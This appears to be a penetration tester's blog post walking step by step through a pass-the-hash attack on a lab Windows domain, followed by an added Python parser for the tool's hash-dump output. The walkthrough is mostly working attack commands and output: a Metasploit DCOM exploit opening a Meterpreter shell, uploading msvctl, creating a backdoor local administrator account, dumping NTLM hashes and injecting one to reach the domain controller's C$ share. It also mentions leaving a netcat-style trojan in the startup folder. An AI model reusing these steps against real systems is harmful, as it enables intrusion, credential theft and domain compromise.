msvctl is very similar to the Pass-the-Hash Toolkit. I couldn't get the Pass-the-Hash Toolkit to work on my XP SP1 VM joined to the LSOCORP domain and was too lazy to update it just to play.
you can read more on msvctl here:
http://truesecurity.se/blogs/murray/default.aspx
It essentially dumps the current hashes from memory; you can then take one of those hashes, "pass it", and run commands as that user. So no more needing to crack hashes: you pass the hash and are that person without ever cracking it.
The scenario we find ourselves in at work, and why I am interested in getting this crap working, is that we pop a box on a domain with a remote exploit but usually end up as SYSTEM. SYSTEM can do whatever it wants EXCEPT anything on the domain: I can do whatever I want on that box, but I don't have any privileges as far as the DC is concerned, and that sux, because the goal is usually to be a domain or enterprise admin. We normally put a netcat type trojan in the startup folder and wait for an admin to log in. Waiting sux, and I'm not a patient guy.
The demo in the link above is done with psexec. I'm on Linux, things weren't quite working out for me, and it wasn't working from a meterpreter shell (probably a token issue, which is probably why he did it with psexec). Anyway, what I did was...
1. Got a remote shell via DCOM (yeah I know, it's a demo, so shut up)
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.29.1:40467 -> 192.168.29.129:4444)
msf exploit(ms03_026_dcom) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.29.1:40467 -> 192.168.29.129:4444
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
2. Created a temp directory and then uploaded msvctl.exe & msvctl.dll via meterpreter
meterpreter > upload
Usage: upload [options] src1 src2 src3 ... destination
Uploads local files and directories to the remote machine.
OPTIONS:
-r Upload recursively.
meterpreter > upload msvctl/msvctl_0.3/msvctl.exe msvctl.exe
[*] uploading : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
[*] uploaded : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
meterpreter > upload msvctl/msvctl_0.3/msvctl.dll msvctl.dll
[*] uploading : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
[*] uploaded : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
3. Created a local account on the box and added it to the local admin group
meterpreter > execute -f cmd.exe -i -c -H
Process 404 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32\temp>net user localfun localfun /add
net user localfun localfun /add
The command completed successfully.
C:\WINDOWS\system32\temp>net localgroup administrators localfun /add
net localgroup administrators localfun /add
The command completed successfully.
4. Logged into the box with my new local account via RDP
5. To test privileges I tried to map the C drive of the domain controller
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\localfun>net use \\192.168.29.128\c$
The password or user name is invalid for \\192.168.29.128\c$.
Enter the user name for '192.168.29.128': localfun
Enter the password for 192.168.29.128:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
6. cd'ed into the msvctl temp directory and ran list to see what hashes were available. We see our own credentials, and that domain user chris has logged on recently.
C:\WINDOWS\system32\temp>msvctl.exe list
luid 0-165157
XPSP1VM\localfun b5176bbcf86d7dc8e72c57ef50f76a05:cad3f54ce9a87c015262d0ae60bcbd6d
luid 0-148121
LSOCORP\chris 19fe4717a7c8b55daad3b435b51404ee:f2c0c177de720154d024a26e09f0feb3
luid 0-43007
luid 0-997
luid 0-996
LSOCORP\XPSP1VM$ 00000000000000000000000000000000:70b9157dabc8abfe803e3fa4e4af4d1a
luid 0-31757
LSOCORP\XPSP1VM$ 00000000000000000000000000000000:70b9157dabc8abfe803e3fa4e4af4d1a
luid 0-999

7. Inject a cmd.exe using LSOCORP\chris's hash and get a cmd.exe shell with his permissions.
C:\WINDOWS\system32\temp>msvctl.exe LSOCORP\chris 19fe4717a7c8b55daad3b435b51404ee:f2c0c177de720154d024a26e09f0feb3 run cmd
info: running 'cmd '
** At this point another cmd.exe shell popped up; from that cmd.exe I was then able to map a share on the domain controller.
C:\WINDOWS\system32>net use * \\192.168.29.128\C$
Drive Z: is now connected to \\192.168.29.128\C$.
The command completed successfully.
C:\WINDOWS\system32>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK Z: \\192.168.29.128\C$ Microsoft Windows Network
\\.host VMware Shared Folders
The command completed successfully.
C:\WINDOWS\system32>z:
Z:\>dir
Volume in drive Z has no label.
Volume Serial Number is 9CB6-7878
Directory of Z:\
05/04/2004 12:41 PM 0 AUTOEXEC.BAT
05/04/2004 12:41 PM 0 CONFIG.SYS
09/05/2007 02:44 PM Documents and Settings
08/12/2007 10:55 AM Inetpub
05/04/2004 03:54 AM Program Files
09/16/2007 01:57 PM WINDOWS
05/04/2004 12:42 PM wmpub
2 File(s) 0 bytes
5 Dir(s) 2,025,148,416 bytes free
Z:\>

8. Have peanut butter jelly time :-)
** Now, in this case we don't know that Chris is a local admin, but for the example he is. I also thought that doing a net user /domain or a net group /domain from that shell would return the information, but it did not ;-( That's something to look into.
TODO: get it working with psexec and see if I can pull information from the domain with that shell.
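An added example, not code from the post or from msvctl: a small Python parser for the `msvctl.exe list` output shown in step 6. It re-joins hash strings that the 80-column terminal wrapped onto a second line and then reports what the LM field tells a defender reviewing such a dump: whether an LM hash is held at all (the NoLMHash policy removes it) and whether its second half shows the password is 7 characters or fewer, as it does for chris. The sample listing is constructed from the step 6 values; treating an all-zero LM field as "no LM hash held" is an assumption.

```python
import re
from collections import namedtuple

LM_EMPTY_HALF = "aad3b435b51404ee"  # LM half for an empty (or <=7 char) password
NO_LM = "0" * 32                    # printed by msvctl when no LM hash is held (assumed)
# Constructed sample in the shape of the step 6 listing, keeping the hash
# lines that the 80-column terminal wrapped onto a second line.
SAMPLE = r"""luid 0-165157
XPSP1VM\localfun b5176bbcf86d7dc8e72c57ef50f76a05:cad3f54ce9a87c015262d0ae60bcb
d6d
luid 0-148121
LSOCORP\chris 19fe4717a7c8b55daad3b435b51404ee:f2c0c177de720154d024a26e09f0feb3
luid 0-43007
luid 0-997
LSOCORP\XPSP1VM$ 00000000000000000000000000000000:70b9157dabc8abfe803e3fa4e4af4
d1a
luid 0-999
"""
Cred = namedtuple("Cred", "luid account lm nt")  # account is DOMAIN\user as printed

def parse_msvctl_list(text):
    """Turn `msvctl.exe list` output into Cred records, re-joining wrapped hashes."""
    creds, luid, pending = [], None, None  # pending = [luid, account, "lm:nt" so far]

    def flush():
        if pending:
            lm, _, nt = pending[2].partition(":")
            if len(lm) == 32 and len(nt) == 32:
                creds.append(Cred(pending[0], pending[1], lm, nt))

    for line in filter(None, (l.strip() for l in text.splitlines())):
        if line.startswith("luid "):
            flush(); pending, luid = None, line[5:]
        elif pending and re.fullmatch(r"[0-9a-f]+", line):
            pending[2] += line  # continuation of a hash wrapped by the terminal
        else:
            flush()
            account, _, hashes = line.partition(" ")
            pending = [luid, account, hashes]
    flush()
    return creds

def assess(cred):
    """Flags from the LM field: is an LM hash held, and is the password <=7 chars?"""
    flags = ["machine-account"] if cred.account.endswith("$") else []
    if cred.lm in (NO_LM, LM_EMPTY_HALF * 2):
        flags.append("no-lm-hash")
    else:
        flags.append("lm-hash-stored")
        if cred.lm[16:] == LM_EMPTY_HALF:  # second DES block is the empty-password block
            flags.append("password<=7")
    return flags
```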